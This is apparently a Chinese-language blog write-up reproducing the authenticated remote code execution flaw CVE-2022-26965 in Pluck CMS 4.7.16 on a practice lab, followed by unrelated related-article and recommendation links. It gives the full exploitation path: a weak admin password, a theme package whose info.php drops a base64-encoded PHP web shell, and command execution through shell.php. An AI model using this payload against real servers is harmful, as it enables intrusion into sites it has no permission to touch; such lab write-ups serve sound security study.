漏洞简介

Pluck CMS 4.7.16 版本的远程代码执行(RCE)漏洞(CVE-2022-26965)。

该漏洞允许经过身份验证的用户通过 /admin.php?action=themeinstall 的主题上传功能执行任意代码。

漏洞细节

在 Pluck CMS 的管理界面中,管理员可以上传主题文件。

CMS在处理主题包时未隔离或限制文件写入操作,导致恶意代码被直接写入Web目录并执行。

漏洞利用

获取管理员权限:攻击者需要首先获取管理员账户的访问权限。

上传恶意主题:利用 /admin.php?action=themeinstall 页面上传包含恶意代码的主题文件。

执行代码:通过访问上传的恶意文件,攻击者可以在服务器上执行任意代码

漏洞复现

先利用弱口令admin登录

选择上传主题的功能点

找到上传点

然后利用cms主题构造木马,在github找到主题

https://github.com/billcreswell/redline-theme

下载压缩包 修改info.php文件

修改内容

<?php

file_put_contents('shell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));

?>

file_put_contents() 函数:把一个字符串写入文件中。

base64_decode()对encoded_data进行解码,返回原始数据。

base64解码  PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg== 得到<?php system($_GET[1]);?>

然后上传压缩包

然后访问/shell.php?1=ls

进行命令执行

春秋云镜的靶场好像无法用蚁剑连接,直接传参命令执行就可以了

Pluck-CMS-Pluck-4.7.16 远程代码执行漏洞(CVE-2022-26965)的更多相关文章

  1. PHPMailer < 5.2.18 远程代码执行漏洞(CVE-2016-10033)

    PHPMailer < 5.2.18 Remote Code Execution 本文将简单展示一下PHPMailer远程代码执行漏洞(CVE-2016-10033)的利用过程,使用的是别人已经 ...

  2. [转帖]Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626)

    Windows DHCPServer远程代码执行漏洞分析(CVE-2019-0626) ADLab2019-03-15共23605人围观 ,发现 4 个不明物体安全报告漏洞 https://www.f ...

  3. Office CVE-2017-8570远程代码执行漏洞复现

    实验环境 操作机:Kali Linux IP:172.16.11.2 目标机:windows7 x64 IP:172.16.12.2 实验目的 掌握漏洞的利用方法 实验工具 Metaspliot:它是 ...

  4. CVE-2017-6920 Drupal远程代码执行漏洞学习

     1.背景介绍: CVE-2017-6920是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. Drupal介绍:Drupal 是一个由 ...

  5. vBulletin 5.x 版本通杀远程代码执行漏洞复现

    漏洞介绍 vBulletin中存在一个文件包含问题,可使恶意访问者包含来自 vBulletin 服务器的文件并且执行任意 PHP 代码.未经验证的恶意访问者可通过向index.php发出包含 rout ...

  6. IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

    CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...

  7. 代码审计之CVE-2017-6920 Drupal远程代码执行漏洞学习

     1.背景介绍: CVE-2017-6920是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core. Drupal介绍:Drupal 是一个由 ...

  8. Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现

    参考了大佬的链接:https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用 ...

  9. Microsoft Exchange远程代码执行漏洞(CVE-2020-16875)

    Microsoft Exchange远程代码执行漏洞(CVE-2020-16875) 漏洞信息: 由于对cmdlet参数的验证不正确,Microsoft Exchange服务器中存在一个远程执行代码漏 ...

  10. Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

    影响版本 Drupal 6.x,7.x,8.x Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞 脚本检测

随机推荐

  1. Docker命令速查

    Docker命令 显示所有正在运行的docker容器 docker ps 显示所有docker容器 docker ps -a 运行容器 docker run : 运行一个容器并连接到它 docker ...

  2. 【EF Core】DbContext是如何识别出实体集合的

    在开始之前说明一下,你不要指望阅读完本文后会得到光,就算得到光你也未必能变成迪迦.本文老周仅介绍原理,可以给部分大伙伴们解惑. 咱们都知道,在派生 DbContext 类时,集体类的集合用 DbSet ...

  3. Blazor学习之旅(9)用MudBlazor重构Todo

    大家好,我是Edison. 在之前的学习之旅(3)开发一个Todo应用中,我们开发了一个简单版的Todo,这次我们基于MudBlazor来重构这个Todo应用. Todo V1回顾 在Blazor入门 ...

  4. 渗透测试工作站搭建:Kali + Wave + Zsh + Tmux + 工具集整合实践

    前言 在开始任何渗透测试工作之前,搭建一个可靠高效的工作环境至关重要.这包括组织工具.配置系统,以及确保所有必要资源随时可用.通过尽早建立结构良好的测试基础架构,我们可以减少停机时间.最大程度地减少错 ...

  5. Luogu P6815 [PA2009] Cakes 题解

    P6815 [PA2009] Cakes 三元环计数题. 无向图三元环计数分为三步: \(1\) :给所有无向边重定向.记录每个点的度数,度数大的点指向度数小的点.如果度数相同,编号小的点指向编号大的 ...

  6. rtl8723bs/ds 蓝牙和wifi共存造成蓝牙的卡顿解决方案.

    首先.先确认 POWER_SAVING 这个宏是否打开,如果打开了请关掉,因为这个功能是路由器把对应的设备的流量包存储在路由器上,然后到一定的包的数量的时候,分发给嵌入式设备.如果这样可能造成天线通过 ...

  7. ABC392

    终于进前一千了. A - Shuffled Equation 人话:给定三个数 \(a,b,c\),判断是否存在两个数乘积为第三个数. 数很小,if 判断一下,long long 也不用开. 点击查看 ...

  8. POLIR-Society-Organization-Networking结网{Ice-break/Connection/Relationship/Networking/Organizing

    POLIR-Society-Organization Networking结网{Ice-break/Connection/Relationship/Networking/Organizing How ...

  9. Windows修改自动更新的时间

    文字流程 Win+R输入 regedit 输入路径 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings 在空白处右键 ...

  10. Archlinux 玩原神

    首先你需要一台装载了archlinux的电脑,配置的话本人: Lenovo TianYi510S-07IMB Intel Core i5-10400 × 12 内存 8.0 GiB 磁盘 1 TB 玩 ...